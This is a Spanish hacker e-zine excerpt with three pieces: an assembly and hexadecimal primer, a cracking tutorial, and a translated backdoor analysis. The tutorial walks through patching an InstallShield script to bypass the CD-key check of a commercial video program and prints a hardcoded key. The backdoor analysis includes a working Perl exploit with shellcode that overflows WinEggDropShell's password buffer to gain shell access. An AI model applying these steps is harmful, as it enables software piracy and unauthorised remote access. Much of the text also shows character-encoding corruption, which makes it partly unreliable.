AHORA PERO QUE ES ENSAMBLADOR

SABEN USTEDES CUAL ES LA DIFERENCIA ENTRE UN COMPILADOR Y EL ENSAMBLADOR

Un compilador es un programa que toma el codigo fuente que usted ha escrito
y lo convierte a instrucciones en lenguaje maquina que son utilizados por la 
computadora.

Una instruccion en lenguaje maquina es un numero binario que le dice a la
computadora que haga una cosa especifica.

Ahora si han sido bueno alumnos, se estaran preguntando y que es ensamblador?

<Bueno eso lo iremos descubriendo a lo largo del Capitulo >

Ahora Hay una cosa importante que tambien necesitan saber

Las diferentes formas de archivo que existen:

1) un ejecutable (.EXE) el archivo contiene cierta informacion para el
   sistema operativo cuando el programa empieza. Esto permite al programa ser 
   tan grande como se quiera.

2) un archivo (.COM) no contiene la informacion para OS . Cuando el sistema
   operativo empieza un archivo .COM simplemente lo pone en la memoria . Los
   archivos con una extension .COM se limitan a una longitud de 64k bytes.

3) los archivos binarios son archivos que deben cargarse en un .COM o .EXE y
   se programan antes de correrse. Estos bichitos no pueden hacer algo por 
   ellos mismos. son un poco arcaicos.

   es decir sirven como muletas para aqu=E9llos compiladores que no apoyan
   archivos .OBJ

4) un objeto (.OBJ) este otro archivo es una seccion de un programa. contiene 
   codigo y variables, pero tambien contiene la informacion que puede usarse 
   para combinarlo con otros archivos del objeto en un programa mas grande.
   Un Linkeador puede convertir uno o mas objetos en un archivo ejecutable.

NOTA : Un linker es utilizado para unir varios archivos y crear uno ejecutable.


<Si es que hasta ahora estan mas confundidos que Yo,no se preocupen esto es 
solo cultura General, Un mal necesario, necesitan conocer estas cosas, no para 
programar en asembler ,pero si para saber que estan haciendo. >

------------------------------------------------------------------------------

Alumno desesperado : Ya entendi, pero lo que quiero hacer es programar ya,
esto es muy facil.


Bueno pequenyo alumno, si eso es lo que quieres Club Fenix te quiere mostrar
algo


; - - - - - - - - - - - - - - - - - - - -
start: push  ds
sub   ax,ax
push  ax
mov   ax, DATASTUFF    ; carga ds
mov   ds,ax

outer_loop:
lea  ax, multiplicand
call get_unsigned_8byte
call print_unsigned_8byte
call get_unsigned
mov  multiplier, ax

lea  si, multiplicand
lea  bx, result
; - - - - - - - - - - - - - - - - - - - -



Entendes lo que que hacen estas instrucciones

Alumno deseperado (ahora palteado) : No maestro ?

Ves entonces hay que ir con calma.

No os preocupeis por lo que estas instrucciones hacen. ustedes aprenderan
eso despues. Lo que se esta tratando de hacer que tengan una idea de lo que 
esta pasando:

Para ello haremos un breve repaso de los sistemas Numericos ( Binario ) y
(Hexadecimal) estamos asumiendo que esto usted ya lo conoce, asi que solo hare 
un Repaso.

Base 2 (binario) permite solo 0s y 1s. 
Base 16 ( hexadecimal) permite 0 - 9, y ademas los proximos seis numeros usando
letras de la A - F. A=3D10, B=3D11, C=3D12, D=3D13, E=3D14 y F=3D15. Puedes
directamente traducir un numero hexadeximal a un numero binario y un binario
a un numero hexadecimal

Un grupo de cuatro dedos en el sistema binario es lo mismo que uno solo
dedo en el hexadecimal.

<SE PERDIERON... COMO LES DIGO NO SE PREOCUPEN POCO A POCO IRAN ENTENDIENDO
MEJOR>


BINARY         HEX      DECIMAL

0100            4          4
1111            F         15
1010            A         10
0011            3          3

AQUI TENEMOS UNOS NUMERO EN BINARIO, HEXADECIMAL Y DECIMAL, OBSERVEN UN POCO
ESTOS NUMEROS


ahora fijense en este pequenyo ejemplo tenemos el siguiente numero binario

0110011010101101

lo que vamos a hacer es dividirlo en grupos de 4 empezando por la derecha y 
resulta lo sgte

0110 0110 1010 1101

y ahora el cambio de cada grupo a un numero en Hexadecimal



0110 ->   4 + 2     ->   6
0110 ->   4 + 2     ->   6
1010 ->   8 + 2     ->   A
1101 ->   8 + 4 + 1 ->   D


Vieron, es lo mas sencillo, de igual manera de hexadecimal a binario

D39F

lo que haremos sera lo contrario a lo que hicimos para pasar de binario a
hexadecimal

es decir cada dedo hexadecimal son 4 dedos binarios de esta forma tenemos lo
sgte

D =3D 13    ->   8 + 4 + 1 ->   1101

Vieron lo facil que es.

Bueno no creo que debamos quedarnos mucho tiempo, en esto pero les recomiendo 
que lean algunos libros o manuales referente a los sistemas binarios y 
hexadecimales y pratiquen como convertir de hex a bin y de bin a hex, sera muy 
importante que conozcan esto.(ahora se que para algunos hay cosas que no han 
quedado claras, por eso si quieren aprender mas pueden hacer dos cosas.

1.esperar a que salga el 2do numero de Fenix (y hacerse viejos esperando)
2.entrar a la seccion de Boletines de la pagina de clubfenix.
  (www.geo51.com/clubfenix)
 




Hasta la proxima.


NOTA DEL AUTOR : Bueno hubiese querido mostrarles mas cosas, pero club
fenix impide que hagamos articulos grandes, asi que mas adelante ire poniendo 
cosas mas practicas y esperemos a que nos permitan escribir articulos muchos 
mas grandes


-[ 3x05 ]--------------------------------------------------------------------
-[ Cracking Power VCR ]------------------------------------------------------
-[ by The Ghost ]------------------------------------------------------------

Articulo publicado en la web de Club Fenix.
Aparece aqui a peticion suya.

-----------INSTALL SHIELDS Y SUS PROTECCIONES DE SIEMPRE---------------------


Ya no es novedad que installshields desde su version 0 hasta la 6.0 y de mas 
utilize las mismas protecciones de siempre, es decir ninguna.

el caso que tenemos aqui es muy particular, es un programa comercial 
perteneciente a Cyberlink tambien creador de Power Dvd el cual tambien no tiene
proteccion, mas aun el cd-key que pide Install Shields para continuar 
instalando Power Dvd se encuentra en el mismo codigo.

esta es la comparacion que hace install shields para instalar Power DvD


Continua instalando si Cd-key escrito por usuario tonto es igual al Cd-key 
de Proteccion Estupida

es decir si Cdkey ingresado es igual a DX8964387JDU seguir instalcion, SINO 
mostrar Mensaje.

es increible como No se pueda proteger mejor un programa de supuestamente 
una empresa respetable.


Pero vamos a crackear Power VcrII Standar ( aunque hasta verguenza me da 
decir crackear)

para ello utilizaremos un Bonito Compilador el SID, lo pueden encontrar en

http://protools.anticrack.de una de las mejoras paginas en cuanto a 
herramientas se refiere.

Ya descargado el programa y descomprimido abrimos el SID y hacemos click en 
File / open
y buscamos el famoso archivo de instalacion que utiliza install shields para 
generar su instalacion. para nuestro programa sera setup.inx

NOTA DEL EDITOR :
en otras versiones anteriores el archivo es setup.ins, para ello utilicen 
isdcc21 tambien se encuentra en protools.


Esperamos a que nuestro programita sea decompilado por SID. asi que mientras 
esperamos un rato
hacemos doble clik en setup.exe y tratamos de instalar POWER VCR II Cuando 
llegamos a la pantalla de Registro introducimos nuestros datos y una CD-KEY 
cualquiera.


y nos saldra una ventanita

-----------------------------------------
|GRAVE					|
|---------------------------------------|
|					|
|El cd-key que ha introducido no es	|
|valido.revise su informacion		|
|----------------------------------------

No es exactamente el mensaje, pero lo que tiene que quedar claro es el mensaje 
de error
Ahora si ustedes se van como locos queriendo buscar ese mensaje, no lo van 
encontrar en SID


Para ello install shields tiene otro archivito llamado value.shl que guarda 
todos los mensajes de errores y otros que no lo son, cuando install shields 
instala un programa lo guarda en la carpeta Temp que se encuentra dentro de 
WINDOW

ahi hay una carpeta que se encuentra entre corchetes 
{15465-e334435-fgfhghh5-hgghh} dentro estan
los archivos que ha descargado nuestro ya querido Install Shields.


NOTA:  los numeros y letras escritos en corchetes son solo numeros al azar, 
no necesariamente son estos,solo lo he puesto como ejemplo.

buscamos como locos Value.shl lo abrimos con wordpad, u otro editor de textos 
y vamos encontrar nuestro mensaje

En el caso de Power Vcr esta

INVALIDCDKEY=The product CD Key that you typed in is not correct.
The product serial number is provided with your shipment.


(dependiendo del lenguaje que hayamos seleccionado, saldra nuestro mensaje)

pero lo importante aqui no es en si el mensaje, mas bien El INVALIDCDKEY

asi que vayamos a SID que ya debe haber descompilado nuestro programa, y 
vamos a la opcion
view / message references



y buscamos nuestro famoso mensajito INVALIDCDKEY, Como SID es muy bueno ha 
ordenado los mensajes en orden alfabetico asi que vamos a todos lo mensajes 
que comienzen con I y encontramos el mensaje.


al hacer Clik encontramos lo sgte

function_4(global_string18);
global_number50 = LASTRESULT;
global_number57 = (global_number50 = 0);
if(global_number57) then // ref index: 2
function_351("INVALIDCDKEY");

hasta ahi tenemos algo importante, sabemos que nuestro mensaje esta englobado 
en global_numero57 el cual resulta de global_numero50 que tambien es calculado 
mucho mas arriba. pero no hay que complicarnos, para otra vez encontraremos el 
cd-key por ahora solo queremos pasar esa pantalla molesta que no nos deja 
instalar el programa.


Si vemos bien el codigo del programa  global_number57=(global_number50=0) 
pensemos un poco

si estamos familirizados con el arte del crackeo y hemos crackeado algun otro 
progama, hemos utilizado el cambio de 75 por 74, es decir cambio de 
instruciones que en vez de hacer lo que hace haga lo contrario.

asi si global_number= 0 que pasa si cambiamos esa condicion a otra cualquiera.

muy bien hagamoslo........ situemonos en el codigo 
global_number57=(global_number50=0)
Y HAGAMOS anticlick, encontraremos varias opciones, hagamos click en != y 
saldra lo sgte

global_number57 = (global_number50 = 0); // changed to "!="


ahora para que grabe los cambios vamos a FILE/PATCH CHANGES hacemos click 
confirmamos y listo

No nos emocionemos probemos si hemos hecho bien... instalamos normal 
escribimos nuestros datos

Cualquier CD-KEY, nos persinamos y hacemos click en siguiente (NEXT) y 
buala, el install shields
acepta el Key, YA NO interrupe la instalacion y prosigue normalmente.


NOTA DE THE GHOST:

En verdad no se si ha esto le pueda llamar programa crackeado, pero lo que 
si es cierto es que en ningun momento hay proteccion de los programas con 
install shields, ademas creo que no esta hecho para eso solo para servir de 
instaladores de programas, pero Cyberlink si es una empresa grande que cobra 
miles por sus programas, deberia pensar mejor en proteger sus programas.



-[ 3x06 ]--------------------------------------------------------------------
-[ Re-backdoors ]------------------------------------------------------------
-[ by FCA00000  ]------------------------------------------------------------

Re-backdoors

Este artМculo es una traducciСn de
https://www.openrce.org/articles/full_view/18
Lo he traducido porque me ha parecido genial. No sСlo la idea, sino el
estilo en el que estА escrito.
Cualquier duda debe ser dirigida al autor original.


Instalar puertas traseras (backdoors) en los programas es un truco muy viejo
usado desde hace dИcadas.
Incluso las mismas puertas traseras incluyen otras puertas, por ejemplo el
famoso "master password" de SubSeven.
TambiИn existe gente que incluye en sus propios programas otros troyanos
hechos por otras personas.
Pero si vas a poner una puerta trasera en un troyano de acceso remoto, corres
el riesgo de arruinar tu reputaciСn cuando se descubre el truco.
DespuИs de todo, alguna de la gente que incluye tu cСdigo de troyano en su
programa son realmente paranoicos e insisten en verificar con un debugger
antes de confiar en tu cСdigo, para comprobar que es lo que tЗ dices que es.

Lo que se tiene al final es una situaciСn parecida a los sistemas de protecciСn
de shareware: quieres ocultar la super-clave para que la gente que desensambla
tu programa no la encuentre, pero, como en todos los sistemas de protecciСn de
shareware, es sСlo una cuestiСn de tiempo antes de que alguien la encuentre y
la rompa.

Por tanto, se necesita un enfoque mas sutil; algo que no use cСdigo sospechoso 
extra que aЯadir al archivo binario. Uno de estos mИtodos es usar un buffer
overflow. Cuando el cracker empiece a buscar el trozo de cСdigo que verifica la
clave, pasarА por encima de tu puerta trasera sin ni siquiera darse cuenta.
Y, como beneficio extra, si te descubren, siempre puedes aducir que fue un
inocente error de programaciСn, y salvar lo que quede de tu reputaciСn,
arreglando el error y mandando un parche.

Aunque la comunidad de hackers ha especulado que este mИtodo podrМa ser muy
eficiente para poner una puerta trasera en el cСdigo, ?ha sido implementado
alguna vez? Bueno, Иsa es una pregunta difМcil; no se sabe a ciencia cierta.
No es nunca posible confirmar la razСn escondida tras el fallo de overflow.
Eso sМ, a veces el error es simplemente "demasiado oportuno" como para ser
un error; todo lo que queda es la sospecha.

Mientras investigaba una instrusiСn en un sistema, descubrМ una puerta trasera
implementada por un chino, llamada WinEggDropShell v1.41 cuyo nombre proviene
de su autor WinEggDrop, que no esta relacionado con el IRC-bot que quizАs te
sea mas conocido.
Por simple rutina, carguИ el backdoor en el debugger OllyDbg para ver cСmo
funcionaba. Es cierto que hay documentaciСn del backdoor, escrita por su
propio autor, pero eso no me sirviС para nada, porque no sИ hablar chino.

Para empezar, WinEggDropShell inyecta una DLL dentro del proceso winlogon.exe
Esta DLL estА comprimida primero con Aspack y luego con EXE32Pack v1.38
Atendiendo a las recomendaciones de Brett Moore en las que nos explica que es
peligroso cargar en OllyDbg cСdigo sospechoso en DLLs, es necesario evitar
cualquier pre-interacciСn que ejecute el cСdigo.
Afortunadamente podemos evitar esto con un truco sencillo: le decimos a OllyDbg
que estА cargando un ejecutable, no una DLL.

Para hacer esto, simplemente cargamos nuestra DLL con el programa Stud_PE (o tu
editor PE favorito) y editas la cabecera PE (si usas Stud_PE, esto es la
opcion "Advanced tree view in hexeditor")

Busca el nodo "CaracterМsticas" y el editor hexadecimal mostrarА el campo
de 16 bits (little-endian) en la cabecera. En este caso, el valor es 0x2102, y
el bit 14 (0x2000) le dice al cargador que Иsto es una librerМa de carga dinАmica.
Podemos limpiar este flag editando el segundo byte de la palabra seleccionada,
cambiando 0x21 por 0x01.
Pulsa "Save to File" y renombra el archivo como .exe , y cАrgalo en OllyDbg.
Ahora ya no se queja mАs de que el fichero es una DLL, y se detiene en la
cabecera de la DLL sin ejecutar el cСdigo de inicializaciСn.

Como este artМculo no trata sobre desempaquetado, dejaremos eso como un
ejercicio para el lector :-)

Tras examinar el archivo en OllyDbg, encuentro la rutina de entrada de datos
para la autentificaciСn:

1000209E  PUSH EBP
1000209F  MOV EBP,ESP
100020A1  SUB ESP,1AC
100020A7  MOV ECX,6B
100020AC  /DEC ECX
100020AD  |MOV DWORD PTR SS:[ESP+ECX*4],FFFA5A5A
100020B4  \JNZ SHORT TBack.100020AC
100020B6  PUSH ESI
100020B7  PUSH EDI
100020B8  MOV EDI,DWORD PTR SS:[EBP+8]
100020BB  MOV DWORD PTR SS:[EBP+8],EDI
100020BE  MOV DWORD PTR SS:[EBP-188],0
100020C8  PUSH TBack.1003EC0D             ; /<%s> = "Enter Password:"
100020CD  PUSH TBack.10015210             ; |<%s> = ""
100020D2  PUSH TBack.1003EC1D             ; |format = "%s%s"
100020D7  LEA EDI,DWORD PTR SS:[EBP-180]  ; |
100020DD  PUSH EDI                        ; |s
100020DE  CALL TBack.10014E1C             ; \sprintf
100020E3  ADD ESP,10
100020E6  LEA EDI,DWORD PTR SS:[EBP-180]
100020EC  PUSH EDI                        ; /Arg2
100020ED  PUSH DWORD PTR SS:[EBP+8]       ; |Arg1
100020F0  CALL TBack.100067C5             ; \TBack.100067C5
100020F5  ADD ESP,8
100020F8  PUSH 100                        ; /n = 100 (256.)
100020FD  PUSH 0                          ; |c = 00
100020FF  LEA EDI,DWORD PTR SS:[EBP-180]  ; |
10002105  PUSH EDI                        ; |s
10002106  CALL TBack.10014DEC             ; \memset
1000210B  ADD ESP,0C
1000210E  CALL TBack.10014978             ; [GetTickCount]
10002113  MOV DWORD PTR SS:[EBP-184],EAX
10002119  /PUSH 80                        ; /n = 80 (128.)
1000211E  |PUSH 0                         ; |c = 00
10002120  |LEA EDI,DWORD PTR SS:[EBP-80]  ; |
10002123  |PUSH EDI                       ; |s
10002124  |CALL TBack.10014DEC            ; \memset
10002129  |ADD ESP,0C
1000212C  |PUSH 0                         ; /Flags = 0
1000212E  |PUSH 100                       ; |BufSize = 100 (256.)
10002133  |LEA EDI,DWORD PTR SS:[EBP-80]  ; |
10002136  |PUSH EDI                       ; |Buffer
10002137  |PUSH DWORD PTR SS:[EBP+8]      ; |Socket
1000213A  |CALL TBack.10014718            ; \recv

?No encuentras algo raro en la llamada a  recv  ? El tamaЯo del buffer se
define como 256, y el buffer estА apuntado por EDI.
Pero justo antes de eso, vemos una llamada a memset usando EDI como buffer, que
extraЯamente usa sСlo 128 bytes!
?Porque limpia sСlo la primera mitad del buffer? Mirando un poco mАs vemos
que EDI se carga con el puntero al stack [EBP-80] , lo que confirma que nuestro
buffer se ha definido sСlo como char[128] al principio de la subrutina.

Al margen de si esto es intencional o no, tenemos la capacidad de sobrecargar
este buffer, simplemente mandando una clave de mАs de 128 caracteres.
Por supuesto, esto no serМa interesante sin su correspondiente exploit:

#!/usr/bin/perl

## usage: ./weds.pl | nc  

$| = 1;

print STDERR "WinEggDropShell 1.41 Authentication Bypass Exploit\n";
print STDERR "By Joe Stewart <joe\@joestewart.org>\n";

print "\x90" x 109;       # relleno
print "\x0a\x00";            # salto_de_linea+null , para alimentar al sscanf
print "\x8d\xac\x24\x28\x04\x00\x00"; # LEA EBP,[ESP+428]   // arregla ebp
print "\x83\xc4\x04";              # ADD ESP,4           // arregal esp
print "\xb8\xb8\x33\x00\x10";   # MOV EAX, 0x100033B8 // rutina de confirmacion
print "\xff\xe0";               # JMP EAX             // salta
print "\x90\x90\x90\x90";       # no importa
print "\xa3\x39\x00\x10";       # direccion de "jmp esp"
print "\xeb\xe5";               # salta al shellcode

while () {
    print;
}

Directo al asunto. Incluso se podria haber hecho en una Зnica linea :)
Y no hay necesidad de escribir un shellcode de acceso remoto, porque
WinEggDropShell ya es un shell de acceso remoto !

O sea que lo Зnico que hacemos es usar el overflow para poner un mini-programa
en el stack, que salta directamente al sitio donde la autentificaciСn se
considera exitosa, saltando por encima del chequeo de clave y dando acceso al
shell de comandos.
Si embargo, no se puede poner una direcciСn "buena" en el stack para que
retorne; hay que apaЯar el stack antes de eso. Para que retorne correctamente
hay que encontrar la instrucciСn tМpica "JMP ESP", que afortunadamente se
encuentra en 0x100039A3.

Por supuesto, sabemos que a los autores de troyanos les gusta poner puertas
traseras, pero antes de incluir este troyano en tu programa, ten en cuenta
que WinEggDropShell 1.41 es bastante viejo, y no escucha en un puerto
determinado. AsМ que no pierdas el tiempo.

La Зnica pregunta que queda es: ?Es posible que un overflow tan obvio sea
un error de programaciСn?


*EOF*